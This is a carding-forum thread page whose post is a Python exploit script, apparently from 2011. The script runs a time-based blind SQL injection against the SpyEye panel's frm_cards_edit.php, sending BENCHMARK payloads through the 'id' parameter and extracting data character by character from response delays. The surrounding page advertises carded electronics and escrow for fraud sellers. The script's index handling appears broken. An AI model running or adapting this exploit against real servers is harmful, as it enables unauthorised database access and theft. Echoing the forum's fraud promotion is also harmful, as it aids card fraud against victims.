We are closing registration and public forum view to Paid & Private in 16 days! CLICK HERE to register FREE.
 
Create an account  

For users privacy, our last domains: CarderHack.com and OmertaHack.net are moved to CardingTeam.ws

Deposit & Withdraw | About Verified Sellers and Escrow | Advertise | Scam Report | Tracking Number Details | ICQ: 717039384

carding forums carding forums
carding forums carding forums
carding forums Paid adv expire in 48 days
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
 
Blind SQL injection SpyEye Python

#1
Code:
#!/usr/bin/python

from httplib import HTTPConnection
from time import time
from sys import exit, argv, stdout
import urllib
print """
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0             __      __   __                   __                           1
1           /'__`\ /'__`\/\ \__              /'__`\                        0
0     _ __ /\ \/\ \/\ \/\ \ \ ,_\ __  __  __/\ \/\ \ _ __    ___ ___       1
1    /\`'__\ \ \ \ \ \ \ \ \ \ \/ /\ \/\ \/\ \ \ \ \ \/\`'__\/' __` __`\    0
0    \ \ \/ \ \ \_\ \ \ \_\ \ \ \_\ \ \_/ \_/ \ \ \_\ \ \ \/ /\ \/\ \/\ \   1
1     \ \_\ \ \____/\ \____/\ \__\\ \___x___/'\ \____/\ \_\ \ \_\ \_\ \_\  0
0      \/_/   \/___/  \/___/  \/__/ \/__//__/   \/___/  \/_/  \/_/\/_/\/_/   1
1                                                                            0
0                                                                            1
1                                       >> SpyEye r0073r xpl01t              0
0                                       >> author : Sanjar Satsura           1
1                                       >> sanjar[at]xakep[dot]ru            0
0                                       >> Public v.0.1                      1
1                                       >> )c(  2011                         0
0                                                                            1
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-0

  Example:                                                        
  Spyeye_r0073r <host>/dir/"version()"                        

"""

if len(argv)<=3: exit()
else:   print "[+]Started pwn..."

host = argv[1]
path = argv[2]
sql = argv[3]
port = 80


hash = ""
full = []

for k in range(48,122):
    full.append(k)
full.append(0)
# full value [48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 0]
# This is the charset to try

delay = 0.5
a=1
while a <= 32:
    for i in full:
        j = 0
        if i == 0:  exit('\n[+]Finished\n')
        #
        start = time()
        # start time for the delay
        conn = HTTPConnection(host,port)
        #values = { "id" : "1 AND (SELECT IF((IFNULL(ASCII(SUBSTRING((4.0.5),a,1)),0)="K"),BENCHMARK(9000000,SHA1(1)),1));-- /*" }
        values = { "id" : "1 AND (SELECT IF((IFNULL(ASCII(SUBSTRING((" + sql + ")," + str(j) + ",1)),0)=" + str(i) + "),BENCHMARK(9000000,SHA1(1)),1));-- /*" }
        data = urllib.urlencode(values)
        print data
        conn.request("GET", path + "frm_cards_edit.php?" + data )
        response = conn.getresponse()
        read = response.read()    
        print read
        
        if response.status == 404: exit('[+]404')
        #404
        now = time()
        if now - start > delay:
        #has come true then the character is valid
            stdout.write(chr(i))
            stdout.flush()
            hash += chr(i)
            a += 1
            break;
        else: j += 1
        print "i vale %s, y J vale %s" %(i,j)
      
      
      
# w4tch u. h4ck u. fuck u. 1337day
# www.r00tw0rm.com
Reply
Paid adv. expire in 31 days
CLICK to buy Advertisement !

    Verified & Trusted Thread-Verified-SELLING-Carded-iPhone-X-XS-Max-Samsung-MacBook-Laptops-TV




Forum Jump: